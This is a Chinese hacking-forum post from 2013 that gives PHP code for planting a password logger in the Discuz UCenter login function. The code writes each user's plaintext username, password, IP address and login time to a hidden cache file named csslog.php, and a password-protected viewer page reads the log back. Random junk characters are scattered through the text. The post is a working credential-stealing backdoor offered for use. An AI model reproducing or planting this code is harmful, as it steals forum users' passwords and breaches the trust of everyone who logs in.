中国网络渗透测试联盟

标题: dz1.5记录用户名和密码 [打印本页]
作者: admin    时间: 2013-2-27 21:40
标题: dz1.5记录用户名和密码
修改uc_client目录下的client.php 在
# x/ o* }. |$ ?function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
0 q- B" b) }1 ?( {& W0 f下加入如上代码,在网站./data/cache/目录下自动生成csslog.php; P% N6 q2 |0 E
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw! r) j. f" B9 P! C# S" M
if(getenv('HTTP_CLIENT_IP')) {
+ [4 P2 a& \1 I/ M. K; s$onlineip = getenv('HTTP_CLIENT_IP');4 E* h# q* ?, Z
} elseif(getenv('HTTP_X_FORWARDED_FOR')) { 9 N, E% `5 d4 Z4 T
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
; c+ ]$ D7 E. I# o} elseif(getenv('REMOTE_ADDR')) { ; x2 j3 _6 S2 W5 m
$onlineip = getenv('REMOTE_ADDR');8 ]: l8 a; l' t# G
} else {
" W" z  N; Q3 T7 Z$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
+ \% b( Q% x) b; y9 M* b7 d! w9 s}
$ l+ {: }. Y) _; L6 b! Q     $showtime=date("Y-m-d H:i:s");+ R9 H4 _$ U  c
    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";& B1 `- q: d7 @* l1 j$ c: \
    $handle=fopen('./data/cache/csslog.php','a+');
! `7 i- c! R, G& \7 ?1 a    $write=fwrite($handle,$record);



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2